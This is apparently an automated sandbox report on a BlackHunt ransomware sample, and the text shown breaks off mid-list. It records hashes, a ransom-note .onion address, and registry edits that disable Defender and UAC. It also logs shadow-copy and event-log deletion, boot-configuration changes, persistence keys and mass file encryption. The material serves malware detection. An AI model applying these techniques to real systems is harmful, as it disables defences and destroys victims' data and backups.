Analysis
-
max time kernel
38s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:33
Static task
static1
Behavioral task
behavioral1
Sample
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
Resource
win10v2004-20231222-en
General
-
Target
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
-
Size
707KB
-
MD5
3396d326b173417704e6bf0d97136a12
-
SHA1
5d5e58b2125fd40756665e1040070653928e98e8
-
SHA256
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1
-
SHA512
3f9de6b913041581563a30b98d27400aa3a8393b012ceb6d0a2e1c8c4d2c74dc38ed8a7fa685c288673ca868b4e2400df045bdd01ecbc41a16339d6e4ab9c3fd
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z8Cvnh:6uaTmkZJ+naie5OTamgEoKxLWaMh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 10528 fsutil.exe 15004 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2132 wevtutil.exe 9512 wevtutil.exe 6220 wevtutil.exe 9256 wevtutil.exe 8400 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6512 bcdedit.exe 6752 bcdedit.exe 10616 bcdedit.exe 11356 bcdedit.exe -
Renames multiple (3368) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6712 wbadmin.exe 11668 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\O: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\A: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\J: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\K: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\G: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\N: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\M: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\W: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\U: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Y: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\B: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\X: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Q: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\S: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\L: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Z: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\V: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\R: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\P: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\H: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\E: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\download-btn.png 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zy______.pfm 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-sl\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\glib.md 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main.css 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\ui-strings.js 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10556 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10576 vssadmin.exe 10568 vssadmin.exe 10024 vssadmin.exe 10328 vssadmin.exe 1264 vssadmin.exe 10724 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7232 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8384 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeRestorePrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeBackupPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeTakeOwnershipPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeAuditPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeSecurityPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeIncBasePriorityPrivilege 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeBackupPrivilege 7156 vssvc.exe Token: SeRestorePrivilege 7156 vssvc.exe Token: SeAuditPrivilege 7156 vssvc.exe Token: SeBackupPrivilege 12812 wbengine.exe Token: SeRestorePrivilege 12812 wbengine.exe Token: SeSecurityPrivilege 12812 wbengine.exe Token: SeSecurityPrivilege 6220 wevtutil.exe Token: SeBackupPrivilege 6220 wevtutil.exe Token: SeSecurityPrivilege 2132 wevtutil.exe Token: SeBackupPrivilege 2132 wevtutil.exe Token: SeSecurityPrivilege 9512 wevtutil.exe Token: SeBackupPrivilege 9512 wevtutil.exe Token: SeSecurityPrivilege 9256 wevtutil.exe Token: SeBackupPrivilege 9256 wevtutil.exe Token: SeSecurityPrivilege 8400 wevtutil.exe Token: SeBackupPrivilege 8400 wevtutil.exe Token: SeDebugPrivilege 7232 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4004 wrote to memory of 1264 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 203 PID 4004 wrote to memory of 1264 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 203 PID 4004 wrote to memory of 1940 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 94 PID 4004 wrote to memory of 1940 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 94 PID 4004 wrote to memory of 2684 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 96 PID 4004 wrote to memory of 2684 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 96 PID 4004 wrote to memory of 4848 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 98 PID 4004 wrote to memory of 4848 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 98 PID 4004 wrote to memory of 3320 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 100 PID 4004 wrote to memory of 3320 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 100 PID 4004 wrote to memory of 3652 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 102 PID 4004 wrote to memory of 3652 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 102 PID 4004 wrote to memory of 3740 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 104 PID 4004 wrote to memory of 3740 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 104 PID 4004 wrote to memory of 3972 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 106 PID 4004 wrote to memory of 3972 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 106 PID 4004 wrote to memory of 4300 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 110 PID 4004 wrote to memory of 4300 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 110 PID 4004 wrote to memory of 3632 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 109 PID 4004 wrote to memory of 3632 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 109 PID 4004 wrote to memory of 764 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 108 PID 4004 wrote to memory of 764 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 108 PID 4004 wrote to memory of 4596 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 115 PID 4004 wrote to memory of 4596 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 115 PID 4004 wrote to memory of 2036 4004 